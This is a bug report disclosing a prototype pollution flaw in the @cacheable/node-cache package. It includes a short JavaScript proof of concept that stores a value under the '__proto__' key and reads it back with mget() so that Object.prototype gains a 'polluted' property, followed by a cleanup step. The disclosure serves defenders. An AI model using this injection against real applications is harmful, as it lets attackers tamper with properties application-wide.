Prototype Pollution in @cacheable/node-cache #1612
Description
Describe the bug
The @cacheable/node-cache package is vulnerable to prototype pollution. Attackers can exploit the set() and mget() methods by using the proto key to modify the prototype of internal data store objects and propagate polluted properties to the prototype of the returned result object. This allows an attacker to inject arbitrary properties into Object.prototype, which can lead to unexpected behavior, property tampering, or other security issues across the application that uses this cache package.
How To Reproduce
Step 1: Install the vulnerable version of @cacheable/node-cache
npm install @cacheable/node-cacheStep 2: Run the following code snippet to reproduce the prototype pollution
// Import the cache library
const NodeCache = require('@cacheable/node-cache');
// Initialize a new cache instance
const cache = new NodeCache({});
// Step 1: Pollute the prototype using set() with __proto__ as the key
cache.set('__proto__', { polluted: true });
// Step 2: Retrieve the value using mget(), which propagates the pollution to the result object's prototype
const result = cache.mget(['__proto__']);
// Verify the prototype pollution - the Object prototype will now have the 'polluted' property
console.log(Object.prototype.polluted); // Output: trueExplanation of Reproduction
The set() method accepts proto as a key and stores the attacker-controlled value ({ polluted: true }), modifying the prototype of the internal cache data store.
The mget() method retrieves the value associated with the proto key and assigns it to result['proto'], which propagates the polluted property to the Object prototype (since proto references the prototype chain).
After execution, Object.prototype.polluted will be true, confirming that the prototype pollution has occurred.
Cleanup (to avoid persistent pollution in test environments)
// Remove the polluted property from Object.prototype
delete Object.prototype.polluted;